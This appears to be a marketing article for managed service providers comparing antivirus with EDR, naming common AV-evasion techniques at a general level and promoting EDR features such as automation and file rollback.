EDR vs. AV - What you need to know
EDR vs. AV - What you need to know
Antivirus (AV) and Endpoint detection and response (EDR) both help protect your Customers' environments, but in their own ways. Although both technologies aim to protect computer systems from malicious attacks, there are significant differences.
AV protects you from viruses and malicious software, but relies on signature-based detection. You remain vulnerable to cybercriminals if their evasion techniques are detected after the damage has already been done. AV is an essential tool for protecting against known threats, but it can be less effective against new, unknown threats.
Endpoint Detection and Response (EDR) software is designed to detect and respond to threats that AV software may not. EDR software monitors a computer's activity and behavior to detect anomalies that could indicate a potential threat. This includes monitoring processes, registry changes, network traffic, and file activity. EDR software can detect sophisticated threats such as fileless malware, suspicious activity, obfuscated malware and advanced persistent threats (APTs) that may go undetected by AV software.
Here are five types of attacks that evade detection by AV:
Browser drive-by downloads
Let's take a look what makes these threats special and how do they actually evade standard AV products.
1. Polymorphic malware
Many traditional AV programs rely on signature-based detection, which compares a file with a known entry (or signature) in a database of known threats (keyword: “known”). Cybercriminals create malware that bypasses AV detection by using polymorphic malware that renews itself in a new way that intentionally does not match the signatures AV relies on.
2. Weaponized documents
3. Browser drive-by downloads
Using browser vulnerabilities, cybercriminals can download malicious files to the endpoint via browser exploits without the victim’s knowledge.
4. Fileless attacks
A fileless attack can sneak past AV by exploiting the vulnerability of files that need to be checked for security. An attacker doesn't even need to install a payload on a system in to exploit this vulnerability. Now hackers can perform malicious processes such as downloading real file-based malware, modifying the registry, or stealing data.
5. Obfuscated malware
AV companies have various methods to detect malware, like executing files in sandbox environments and looking for malicious behavior or scanning the code for general signs of malicious code. Cybercriminals attempt to circumvent this in malware code by detecting a sandbox environment, then attacking in a live environment. Cybercriminals use “packers” to encrypt or compress malicious code to prevent anyone from peeking inside the file.
Automation and rollback
EDR is an all-in-one solution that provides the usual benefits of AV but with even more security. MSPs manage EDR without the end user having to do anything.
AV software typically relies on manual updates to its database of known malware signatures, which can lead to delay between the discovery of a new threat and its detection by the software. EDR software, on the other hand, is highly automated and can respond to threats in real time.
EDR, comprising of monitoring software and endpoint agents, incorporates machine learning and advanced artificial intelligence (AI) to stop the attack before it even happens. EDR can detect suspicious behavior, such as modifying multiple files and alert the administrator to stop the attack.
EDR's most important feature is infected file rollback, which helps future-proof your end users' machines. With its active root cause analysis provides solution via a “visual storylines”, where you can see what process spawned the attack, how it replicated and spread, and even how the threat is constructed.
In summary, while AV is an important tool to protect computer systems from cyberattacks, it can be circumvented by certain types of attacks. EDR provides an additional layer of protection that includes machine learning, advanced AI and active root cause analysis to detect and stop attacks before they happen. EDR can be processed locally on the endpoint, enabling rapid threat detection and recovery, making it an ideal tool for future-proofing your end users' computers.